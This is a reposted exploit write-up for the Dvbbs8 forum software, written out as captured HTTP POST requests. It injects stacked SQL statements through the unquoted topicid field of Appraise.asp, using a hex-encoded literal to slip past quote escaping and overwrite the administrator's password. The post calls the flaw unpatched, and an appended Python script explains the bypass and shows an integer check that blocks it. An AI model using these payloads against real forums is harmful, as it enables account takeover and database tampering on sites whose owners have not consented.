Dvbbs8 critical vulnerability
Author: Allyesno[AT]77169.org
I have already set up a DVBBS8 (SQL Server edition) here:
First we register a user and find any post. I just broke that one....
Let's post a new thread, click "Post comment", and capture the request here:
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 91
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0
boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test
OK, let's start.
Let's have some fun.
userpost is the number of posts the user has made. I got the count wrong.
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ';'.
/dvbbs8/inc/Dv_ClsMain.asp, line 1504
When this appears, ignore it: the update has in fact already gone through!
Posts: 100
Let's keep going with the modification. There is one small obstacle in the program that we have to deal with: TopicID = Dvbbs.CheckStr(Request.Form("topicid"))
Public Function Checkstr(Str)
    If Isnull(Str) Then
        CheckStr = ""
        Exit Function
    End If
    ' Only NUL bytes are stripped and single quotes doubled; nothing checks that
    ' the value is actually a number, which is what the next steps rely on.
    Str = Replace(Str,Chr(0),"")
    CheckStr = Replace(Str,"'","''")
End Function
Clearly it filters single quotes.... But topicid is used unquoted as a number, so a stacked statement that contains no quote at all passes through CheckStr untouched. We get around it like this:
Let's change the password after all. ADMIN's password is currently admin888; let's change it to 123456:
declare @a sysname
select @a=0x3400390062006100350039006100620062006500350036006500300035003700
update [dv_user] set userpassword=@a where userid=1
The hex literal is the UTF-16LE encoding of 49ba59abbe56e057, the 16-character MD5 that Dvbbs stores for 123456; assigning it to a sysname (nvarchar) variable gives us the string without writing a single quote, so CheckStr never gets in the way. This modifies it successfully!!! Now let's change it back:
%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1
OK, this statement can also be executed:
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=3&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 242
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=Y1tGx4j886XtB846&userhidden=2; List=list1=1; w0802=5; rtime=0; ltime=1186474916718; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0
boardid=1&topicid=3%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1&announceid=3&atype=0&a1=0&a2=0&atitle=22&acodestr=3297&acontent=33
See? The password has been changed to 123456.
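As an added example (not part of the original post and not Dvbbs code), the following Python script models why CheckStr does not stop this payload and what the hex literal in it encodes: it re-implements CheckStr, shows that the injected topicid passes through unchanged because it contains no quote, decodes the 0x... literal to 49ba59abbe56e057 and compares it with the 16-character MD5 of 123456, and shows an integer check that rejects the payload. The SELECT shape in build_sql is constructed for illustration and is not the real query at Dv_ClsMain.asp line 1504, which the post does not show; dvbbs_md5_16, nvarchar_hex_literal, is_valid_topic_id and parse_topic_id are names chosen here.

```python
import hashlib
import re

# Python replica of Dvbbs 8's CheckStr from inc/Dv_ClsMain.asp (quoted in the
# post above): it strips NUL bytes and doubles single quotes, nothing more.
def check_str(s):
    if s is None:
        return ""
    s = s.replace("\x00", "")
    return s.replace("'", "''")

# Assumed helper name. Dvbbs stores the 16-character MD5: the middle 16 hex
# digits (positions 9-24) of the 32-character MD5 hex digest.
def dvbbs_md5_16(password):
    return hashlib.md5(password.encode("ascii")).hexdigest()[8:24]

# A T-SQL binary literal (0x...) holding the UTF-16LE bytes of a string; assigning
# it to a sysname (nvarchar) variable yields the string without any quote character.
def nvarchar_hex_literal(text):
    return "0x" + text.encode("utf-16-le").hex()

def decode_nvarchar_hex(literal):
    return bytes.fromhex(literal[2:]).decode("utf-16-le")

# The literal and the topicid payload from the post, after URL decoding.
HEX_FROM_POST = "0x3400390062006100350039006100620062006500350036006500300035003700"
PAYLOAD = ("3;declare @a sysname select @a=" + HEX_FROM_POST
           + " update dv_user set userpassword=@a where userid=1")

# Constructed illustration of the vulnerable pattern: the escaped value is
# concatenated unquoted into a numeric comparison, so doubling quotes is
# irrelevant and the stacked statements run. This is NOT the real query at
# Dv_ClsMain.asp line 1504, which the post does not show.
def build_sql(topicid):
    return "SELECT * FROM Dv_Topic WHERE TopicID=" + check_str(topicid)

# Hardened replacement (assumed names): a numeric id is validated as such,
# so the stacked-query payload is rejected before it reaches any query.
def is_valid_topic_id(raw):
    return raw is not None and re.fullmatch(r"[0-9]{1,9}", raw.strip()) is not None

def parse_topic_id(raw):
    if not is_valid_topic_id(raw):
        raise ValueError("topicid must be a positive integer")
    return int(raw)

if __name__ == "__main__":
    print("CheckStr leaves the payload unchanged:", check_str(PAYLOAD) == PAYLOAD)
    print("hex literal decodes to:", decode_nvarchar_hex(HEX_FROM_POST))
    print("16-char MD5 of 123456:  ", dvbbs_md5_16("123456"))
    print(build_sql(PAYLOAD))
    print("hardened check accepts payload:", is_valid_topic_id(PAYLOAD))
```

The practical lesson is the one the post demonstrates: escaping quotes is not validation. A parameter that is used as a number must be parsed as a number (or bound as a typed parameter), otherwise any quote-free stacked statement, with string values smuggled in as hex literals, goes straight through.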
This vulnerability is quite serious, so please use it with caution; the vendor has not released a patch yet!!!!!!
Reposted from: https://blog.51cto.com/foxhack/37662